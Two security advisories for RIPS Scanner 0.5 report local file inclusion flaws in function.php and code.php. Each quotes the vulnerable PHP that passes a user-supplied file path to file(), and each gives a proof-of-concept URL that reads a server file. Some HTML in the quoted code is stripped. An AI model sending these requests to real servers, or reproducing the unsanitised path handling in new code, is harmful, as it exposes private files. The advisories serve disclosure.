================================================================================ # Rips Scanner 0.5 - Local File Inclusion ================================================================================ # Vendor Homepage: https://github.com/robocoder/rips-scanner # Date: 24/12/2015 # Software Link: https://github.com/robocoder/rips-scanner/archive/master.zip # Version : 0.5 # Author: Ashiyane Digital Security Team # Contact: hehsan979@gmail.com # Source: http://ehsansec.ir/advisories/rips-lfi.txt ================================================================================ # Vulnerable File : function.php # Vulnerable Code: 58 $file = $_GET['file']; 59 $start = (int)$_GET['start']; 60 $end = (int)$_GET['end']; 61 $ext = '.'.pathinfo($file, PATHINFO_EXTENSION); 62 63 64 if(!empty($file) && is_file($file) && in_array($ext, $FILETYPES)) 65 { 66 $lines = file($file); 67 68 if( isset($lines[$start]) && isset($lines[$end]) ) 69 { 70 for($i=$start; $i<=$end; $i++) 71 { 72 echo highlightline($lines[$i], $i); 73 } 74 } else 75 { 76 echo 'Sorry, wrong file referenced.'; 77 } 78 } else 79 { 80 echo 'Sorry, no file referenced.'; 81 } # PoC : http://localhost/rips/windows/function.php?file=/var/www/html/index.php&start=1&end=20 Parmetrs : file = path/file start = 0 end = number of page's lines ================================================================================ # Discovered By : Ehsan Hosseini (EhsanSec.ir) ================================================================================ ------ ================================================================================ # Rips Scanner 0.5 - (code.php) Local File Inclusion ================================================================================ # Vendor Homepage: https://github.com/robocoder/rips-scanner # Date: 24/12/2015 # Software Link: https://github.com/robocoder/rips-scanner/archive/master.zip # Version : 0.5 # Author: Ashiyane Digital Security Team # Contact: hehsan979@gmail.com # Source: http://ehsansec.ir/advisories/rips-code-lfi.txt ================================================================================ # Vulnerable File : code.php # Vulnerable Code: 102 $file = $_GET['file']; 103 $marklines = explode(',', $_GET['lines']); 104 $ext = '.'.pathinfo($file, PATHINFO_EXTENSION); 105 106 107 if(!empty($file) && is_file($file) && in_array($ext, $FILETYPES)) 108 { 109 $lines = file($file); 110 111 // place line numbers in extra table for more elegant copy/paste without line numbers 112 echo ''; 113 for($i=1, $max=count($lines); $i<=$max;$i++) 114 echo "'; 115 echo '
$i
'; 116 117 $in_comment = false; 118 for($i=0; $i<$max; $i++) 119 { 120 $in_comment = highlightline($lines[$i], $i+1, $marklines, $in_comment); 121 } 122 } else 123 { 124 echo ''; 125 } # PoC : http://localhost/rips/windows/code.php?file=/var/www/html/index.php Vulnerable Parameter : file ================================================================================ # Discovered By : Ehsan Hosseini (EhsanSec.ir) ================================================================================
Invalid file specified.